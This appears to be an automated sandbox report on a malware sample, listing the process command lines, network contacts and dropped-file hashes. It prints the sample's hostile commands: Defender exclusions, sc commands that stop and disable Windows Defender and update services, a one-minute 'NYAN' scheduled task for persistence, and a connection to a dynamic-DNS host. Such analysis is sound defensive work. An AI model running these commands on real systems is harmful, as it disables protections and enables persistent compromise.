"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /Delete /tn NYAN /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2320 -ip 2320

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2320 -s 1756

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn NYAN /tr "C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe" /sc minute /mo 1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout 1

C:\Windows\SysWOW64\timeout.exe

timeout 1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 868 -ip 868

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 868 -s 1852

C:\Windows\SysWOW64\schtasks.exe

schtasks /Delete /tn NYAN /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn NYAN /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe" /sc minute /mo 1

C:\Windows\EdgeBrowser.exe

"C:\Windows\EdgeBrowser.exe"

C:\Windows\system32\sc.exe

sc stop windefend

C:\Windows\system32\sc.exe

sc config SecurityHealthService start= disabled

C:\Windows\system32\sc.exe

sc stop WdiSystemHost

C:\Windows\system32\sc.exe

sc config InstallService Start= disabled

C:\Windows\system32\sc.exe

sc stop InstallService

C:\Windows\system32\sc.exe

sc config WdiSystemHost start= disabled

C:\Windows\system32\sc.exe

sc config WdiServiceHost start= disabled

C:\Windows\system32\sc.exe

sc stop WdiServiceHost

C:\Windows\system32\sc.exe

sc config wscsvc start= disabled

C:\Windows\system32\sc.exe

sc stop wscsvc

C:\Windows\system32\sc.exe

sc config SDRSVC start= disabled

C:\Windows\system32\sc.exe

sc stop SDRSVC

C:\Windows\system32\sc.exe

sc stop SecurityHealthService

C:\Windows\system32\sc.exe

sc config WaasMedicSvc start= disabled

C:\Windows\system32\sc.exe

sc stop WaasMedicSvc

C:\Windows\system32\sc.exe

sc config usosvc start= disabled

C:\Windows\system32\sc.exe

sc stop usosvc

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\sc.exe

sc config Sense start= disabled

C:\Windows\system32\sc.exe

sc stop Sense

C:\Windows\system32\sc.exe

sc config windefend start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e8a9de02-0594-4d3e-9afc-2e8d01ca4dd4\test.bat"

C:\Users\Admin\AppData\Local\Temp\e8a9de02-0594-4d3e-9afc-2e8d01ca4dd4\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\e8a9de02-0594-4d3e-9afc-2e8d01ca4dd4\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\e8a9de02-0594-4d3e-9afc-2e8d01ca4dd4\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout 1

C:\Windows\SysWOW64\timeout.exe

timeout 1

C:\Windows\System32\sihclient.exe

C:\Windows\System32\sihclient.exe /cv M0nPrqn9l0uxnPFE5ym+WA.0.2

C:\Windows\EdgeBrowser.exe

"C:\Windows\EdgeBrowser.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3864 -ip 3864

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 1756

C:\Windows\SysWOW64\schtasks.exe

schtasks /Delete /tn NYAN /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn NYAN /tr "C:\Windows\EdgeBrowser.exe" /sc minute /mo 1

C:\Windows\EdgeBrowser.exe

C:\Windows\EdgeBrowser.exe

C:\Users\Admin\AppData\Local\Temp\008d5608-fb82-4b14-a4f4-16aeb5d00930\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\008d5608-fb82-4b14-a4f4-16aeb5d00930\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\008d5608-fb82-4b14-a4f4-16aeb5d00930\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\008d5608-fb82-4b14-a4f4-16aeb5d00930\test.bat"

C:\Windows\system32\sc.exe

sc stop windefend

C:\Windows\system32\sc.exe

sc config windefend start= disabled

C:\Windows\system32\sc.exe

sc stop Sense

C:\Windows\system32\sc.exe

sc config Sense start= disabled

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\sc.exe

sc stop usosvc

C:\Windows\system32\sc.exe

sc config usosvc start= disabled

C:\Windows\system32\sc.exe

sc stop WaasMedicSvc

C:\Windows\system32\sc.exe

sc config WaasMedicSvc start= disabled

C:\Windows\system32\sc.exe

sc stop SecurityHealthService

C:\Windows\system32\sc.exe

sc config SecurityHealthService start= disabled

C:\Windows\system32\sc.exe

sc stop SDRSVC

C:\Windows\system32\sc.exe

sc config SDRSVC start= disabled

C:\Windows\system32\sc.exe

sc stop wscsvc

C:\Windows\system32\sc.exe

sc config wscsvc start= disabled

C:\Windows\system32\sc.exe

sc stop WdiServiceHost

C:\Windows\system32\sc.exe

sc config WdiServiceHost start= disabled

C:\Windows\system32\sc.exe

sc stop WdiSystemHost

C:\Windows\system32\sc.exe

sc config WdiSystemHost start= disabled

C:\Windows\system32\sc.exe

sc stop InstallService

C:\Windows\system32\sc.exe

sc config InstallService Start= disabled

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout 1

C:\Windows\SysWOW64\timeout.exe

timeout 1

C:\Windows\EdgeBrowser.exe

"C:\Windows\EdgeBrowser.exe"

C:\Windows\EdgeBrowser.exe

"C:\Windows\EdgeBrowser.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3652 -ip 3652

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3652 -s 908

C:\Windows\SysWOW64\schtasks.exe

schtasks /Delete /tn NYAN /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn NYAN /tr "C:\Windows\EdgeBrowser.exe" /sc minute /mo 1

C:\Windows\EdgeBrowser.exe

C:\Windows\EdgeBrowser.exe

C:\Users\Admin\AppData\Local\Temp\2841dd81-cf01-489d-83c7-652a0936f2d0\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\2841dd81-cf01-489d-83c7-652a0936f2d0\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\2841dd81-cf01-489d-83c7-652a0936f2d0\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2841dd81-cf01-489d-83c7-652a0936f2d0\test.bat"

C:\Windows\system32\sc.exe

sc stop windefend

C:\Windows\system32\sc.exe

sc config windefend start= disabled

C:\Windows\system32\sc.exe

sc stop Sense

C:\Windows\system32\sc.exe

sc config Sense start= disabled

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\sc.exe

sc stop usosvc

C:\Windows\system32\sc.exe

sc config usosvc start= disabled

C:\Windows\system32\sc.exe

sc stop WaasMedicSvc

C:\Windows\system32\sc.exe

sc config WaasMedicSvc start= disabled

C:\Windows\system32\sc.exe

sc stop SecurityHealthService

C:\Windows\system32\sc.exe

sc config SecurityHealthService start= disabled

C:\Windows\system32\sc.exe

sc stop SDRSVC

C:\Windows\system32\sc.exe

sc config SDRSVC start= disabled

C:\Windows\system32\sc.exe

sc stop wscsvc

C:\Windows\system32\sc.exe

sc config wscsvc start= disabled

C:\Windows\system32\sc.exe

sc stop WdiServiceHost

C:\Windows\system32\sc.exe

sc config WdiServiceHost start= disabled

C:\Windows\system32\sc.exe

sc stop WdiSystemHost

C:\Windows\system32\sc.exe

sc config WdiSystemHost start= disabled

C:\Windows\system32\sc.exe

sc stop InstallService

C:\Windows\system32\sc.exe

sc config InstallService Start= disabled

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout 1

C:\Windows\SysWOW64\timeout.exe

timeout 1

C:\Windows\EdgeBrowser.exe

"C:\Windows\EdgeBrowser.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4380 -ip 4380

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4380 -s 1604

C:\Windows\SysWOW64\schtasks.exe

schtasks /Delete /tn NYAN /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn NYAN /tr "C:\Windows\EdgeBrowser.exe" /sc minute /mo 1

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 dontreachme3.ddns.net udp
US 216.218.135.118:3604 dontreachme3.ddns.net tcp
US 8.8.8.8:53 118.135.218.216.in-addr.arpa udp
US 8.8.8.8:53 81.171.91.138.in-addr.arpa udp
US 8.8.8.8:53 91.16.208.104.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe

MD5 17fc12902f4769af3a9271eb4e2dacce
SHA1 9a4a1581cc3971579574f837e110f3bd6d529dab
SHA256 29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512 036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe

MD5 730e216d275e35cbb81d3f1b709b228b
SHA1 21b92b5eb008a4eebd3f517b1716bc0851c76721
SHA256 80502885722e2b1e083a55428641eb89be7c40b7aef5eb5c64860c8063238d19
SHA512 02fc645558067f18f43820f79b41ec19d060c8b533cd87fa090693150ca8342efed59d9e6dd75da74c2e3184e330d6ab5fb97b83b4a712dc4507ca76da9a2a88

memory/1376-36-0x00000000745C0000-0x0000000074D70000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe

MD5 75943786884d898bcd0b33357bd0d4f0
SHA1 3224fea4ab0d7d802557d40a7397f62851ace5b2
SHA256 3f4c6c332c7663cb00a26ebf7a96a86158f860c05aab166b14a322cf2756249f
SHA512 4c260f01ce462b7447b466fdd29b0793fdcb87c3767b1606e15465c02b9bda07583cbb4d582e4410a86931854a4ff2dc6822017a2ebebf8615dc89ea85971e5e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe

MD5 715f46ac730dde8d1439d6b78da3050c
SHA1 ea95023b269af1e801286d341ac5499ea34cfd6f
SHA256 c088f887a120770807cc09e3bad4da8a095f53f792bffa3ed751b5dc1c9b9347
SHA512 54821dcc99b4ec5183861ee0ad8ac358d60f29b4c10877df8992e40bc9577cc220ca3f580ed232c232f504aa2127992d4d01703dad5597944baf83c954c4718e

memory/868-40-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/1376-41-0x0000000002520000-0x0000000002530000-memory.dmp

memory/1376-42-0x0000000002520000-0x0000000002530000-memory.dmp

memory/3616-43-0x0000000005310000-0x0000000005320000-memory.dmp

memory/3616-44-0x0000000005310000-0x0000000005320000-memory.dmp

memory/2896-45-0x0000000004D40000-0x0000000004D62000-memory.dmp

memory/4440-47-0x00000000025C0000-0x00000000025D0000-memory.dmp

memory/2896-50-0x0000000005570000-0x00000000055D6000-memory.dmp

memory/1080-51-0x0000000005150000-0x0000000005160000-memory.dmp

memory/2320-49-0x0000000007220000-0x000000000722A000-memory.dmp

memory/4440-48-0x00000000025C0000-0x00000000025D0000-memory.dmp

memory/2896-52-0x00000000055E0000-0x0000000005646000-memory.dmp

memory/1360-54-0x0000000005010000-0x0000000005020000-memory.dmp

memory/1080-53-0x0000000005150000-0x0000000005160000-memory.dmp

memory/2896-55-0x0000000005650000-0x00000000059A4000-memory.dmp

memory/1360-66-0x0000000005010000-0x0000000005020000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p4tf1zle.i5d.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3616-75-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/4440-76-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/1080-77-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/1360-98-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/552-99-0x0000000004980000-0x0000000004990000-memory.dmp

memory/552-105-0x0000000004980000-0x0000000004990000-memory.dmp

memory/320-106-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/320-111-0x0000000000CD0000-0x0000000000CE0000-memory.dmp

memory/552-122-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/868-112-0x0000000006820000-0x0000000006830000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\test.bat

MD5 b2a5ef7d334bdf866113c6f4f9036aae
SHA1 f9027f2827b35840487efd04e818121b5a8541e0
SHA256 27426aa52448e564b5b9dff2dbe62037992ada8336a8e36560cee7a94930c45e
SHA512 8ed39ed39e03fa6d4e49167e8ca4823e47a221294945c141b241cfd1eb7d20314a15608da3fafc3c258ae2cfc535d3e5925b56caceee87acfb7d4831d267189e

memory/1376-151-0x0000000005E40000-0x0000000005E5E000-memory.dmp

memory/2896-152-0x00000000061C0000-0x000000000620C000-memory.dmp

memory/3616-153-0x0000000007670000-0x00000000076A2000-memory.dmp

memory/3616-154-0x000000007FC90000-0x000000007FCA0000-memory.dmp

memory/3616-155-0x000000006F8A0000-0x000000006F8EC000-memory.dmp

memory/1376-170-0x0000000002520000-0x0000000002530000-memory.dmp

memory/1376-171-0x0000000002520000-0x0000000002530000-memory.dmp

memory/2896-158-0x000000006F8A0000-0x000000006F8EC000-memory.dmp

memory/3616-172-0x00000000076C0000-0x0000000007763000-memory.dmp

memory/3616-169-0x0000000007650000-0x000000000766E000-memory.dmp

memory/2320-190-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/2896-191-0x00000000745C0000-0x0000000074D70000-memory.dmp

memory/2896-193-0x0000000004900000-0x0000000004910000-memory.dmp

memory/4440-194-0x000000006F8A0000-0x000000006F8EC000-memory.dmp

memory/2320-195-0x0000000006220000-0x0000000006230000-memory.dmp

memory/4440-206-0x000000007F420000-0x000000007F430000-memory.dmp

memory/1376-157-0x000000007EF40000-0x000000007EF50000-memory.dmp

memory/4440-208-0x00000000025C0000-0x00000000025D0000-memory.dmp

memory/1080-210-0x000000006F8A0000-0x000000006F8EC000-memory.dmp

memory/1376-209-0x0000000007190000-0x00000000071AA000-memory.dmp

memory/4440-207-0x00000000025C0000-0x00000000025D0000-memory.dmp

memory/3616-205-0x0000000008070000-0x00000000086EA000-memory.dmp

memory/1376-156-0x000000006F8A0000-0x000000006F8EC000-memory.dmp

memory/5432-304-0x0000000000400000-0x000000000041A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f3ff369ed4627592f38e9d8b56b9860e
SHA1 9bca1801767c963f031a3a086629da99e06afbc7
SHA256 35ac065038538d4ab322bf6d557fb135d1b459ebd151ec50cf6d6166adbf6bb0
SHA512 9054088b3a1393483244325d7cc56939df101b0a279f1e08b4e30db8397f38fbb039458ff23bc33dc11d460445ea8a57be760c06962eed29ef6604fbe05edeac

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2b61613deb3c401d5958654afbf238e4
SHA1 ffa7f35252df7925186f28cd37d0ffb9167ff1ee
SHA256 96dad8750fd7a590a6a4f5cb243ab55e9ea4d9c46bbe797ef2bac168e78f27ff
SHA512 d05f89130a2fbcb5d8ab63eea324edc35cd10a40976b8d0caa0e3c1bf011ac45d45bb4cf8a07fee956cf30550afabee860a5a0299324b65aacf46b787f85f87e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 329952f834379bf2875b4db251d912f3
SHA1 27b4ec4d29d10adb409741320fefe61a3218b5c4
SHA256 8dd5f3fe1a41b95d55dc8b6dcd14dd9fdfbc156d6fc237dceced77c4b3fd1dbd
SHA512 6a4ab97add77f5aabf3ccf03804cdfd30c0dfef3df085819495cb1c6c919f3b3e5627cfe4d0edb765330c8b8280f125f0596a606dc017906f5ae486de80b3f3b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 33ca929e023719ea658483a8003440f3
SHA1 ea074ddf22c609d268937dfbf9890805b998d1f0
SHA256 e070605c605d04fe98743fbb7910808cb9c6653e7d0e644ef7aa7c2959e6685b
SHA512 6e5d11cd83e6f1df12793b648e66b0e457067f83e2893251022c6d3d31521650a9f0d2c4cf3303f142c5cb9597af97fefe7d9738d8d9863957f26105951bcab7

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 73627b3a4a23005b8d8a4f44ee956d09
SHA1 d9f48698f83851d6d59cb5db1b2e8d05588125e8
SHA256 825e543611c2dc08f89f4eda465a9df84d050b9594bb2ff745e5cfbd8452626a
SHA512 3c574e508aaa8affd25520d1e0dfc09e0dc49401f63bcf82f96c9c4cedc7152431679aef9be1f820dfdf6774d9a364bfee7c4c7b413edd77b128126ea4ff291a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ee8e51193bb9bd7102bda5424230d274
SHA1 091b226ca758ec2406ccb7b1fee35f52535ded7d
SHA256 2cf262e516568164690da14e3a0ef1ef8d0d9748185eef3a1443969c5d8451c1
SHA512 562c25b7a1e16e62acfc30bb5c8b592a5ee9ce6db7add2dbc91a95bf499abf1adb2cbd9b1116a82faa18b689c12adc040fbc9a320308051170629c6f196058f0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b1ee8842dc4d0a87f5e02577a193efde
SHA1 cbb85515032a6729d728341e5093b81b7b79fb9c
SHA256 72493c1ce10829c803abd37bd10d628722e80014a5c31c6b0dfa050a99b9fbd7
SHA512 d2360f52adf4af4c2862d35a045dc7395baba5dd9357d8ef2d67458604a9bbf18336bcaa2cce92b5a02598ac21cda78377e78b5b4a9b9734cf2f4bc1e4aad4ae

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 76283a739a91052d8e15b06e224886ab
SHA1 e3f575d73ce1ffd954097a5ec05308dbc4c77f26
SHA256 ffdb32151113d42f976eda98773365b61dcce26f909652bf102c3f4177e087b5
SHA512 f853b0d923ef85a2402e034bc77c642de74737ec6f7a09f26d2ee25cb8ef5774e9676c0300b839395690e0ebaf75e7903ade967c07e50662599a390503c66113

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 057819fcfdbf14ab966a39eedafbde4f
SHA1 e20c61d2833f4170c91384f36170c239d3c548ea
SHA256 65d033459b7c49b191298a85776042837322039bbfed517cca7740dcd36f4dfb
SHA512 920ecc541444615127d57074dfcee2e16d7b717a1de53dd6b8ccd8a608d904a4dd81bb392258b64d895dae7e6225339ffbafeecfe5276b7276f577232c011221

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 baae53960a16dc597dd58f7483d0e244
SHA1 1652ebb8d43bdd394477e3ac971164987a8d180f
SHA256 9d04961f6061cafe3ecbe37d17e15f49e912c865534770f6c31d72e1ab5c3489
SHA512 199027fbd5d8cdb8876b397d625656bc7144019f4463655ccd2859099fb581918cc7fa91e08eb58526e3676a0d9e8d2400994f141e89d4c1aae6fe68f945de0b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe

MD5 4f70e8af9ae9f628b8a1b4ddd76d911c
SHA1 505ea25565d741edc020925ead156e6fd7d7487f
SHA256 555e6e85bccacb4db1cde30167bfdca8bcc16392e19031e943cc864d07f8aca3
SHA512 8309c77f724c8e8b81d6486488ca7c01e80c1826c5a50022ac788ddaa31d8b5f9f13b00b480aa7acc1f2595703d6969da681b647855335fdc4ae26eaf7591c81

C:\Windows\EdgeBrowser.exe

MD5 cbca9027b0f391f421bc236ca417848c
SHA1 0d1e83363f5c030c83a746d74a609778e05432a8
SHA256 7d02fbfd3d9b209f24bdd1727a979c1bacf83f5d12a2b618e05c36ba40ff826f
SHA512 48b6b28d4aa7004e047e62d2a37c5ec0f73f8e6546e21913b7627d4daf15e6556730216bee63a8974afa2666494f7d235ef8b9be64dce7aeee6e444757acb46f

C:\Windows\EdgeBrowser.exe

MD5 81bda5dffbd964c6199ff8f9fb62c386
SHA1 ea645805a8e9872304e402832b6fbfc96bdb660a
SHA256 89c860c035a86b1e1c1af540eaaabb15db50a15c70086b2d986a159c32d1e918
SHA512 bb9baaac4c57a703bc0f3e7307ed4596a6d10ea90a5f6fd48e06d3a015447aa644b9f8ab5e0496a3cb8a738fd6bc72c3158c4203530a4342b555473197bc71f1

C:\Windows\EdgeBrowser.exe

MD5 796ed4b0db9b3d50149b39c35c97fb22
SHA1 154fde51c43d3a8b8f1b96df04f3e97fe4c922a6
SHA256 37db478cd1a50883e179c601987b3a5171823aaa9d04063817fa7af57723ffb7
SHA512 762989d2993cc2431b50ae9a2847cc3b16bce41c15da9a974dd90c66884ac28b32698edbf9d13b948d7b1f22919278b43e4448710dda2b2489b509bd6ecf00c7

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6a93937d54e9fd95fb056f6d64d075ed
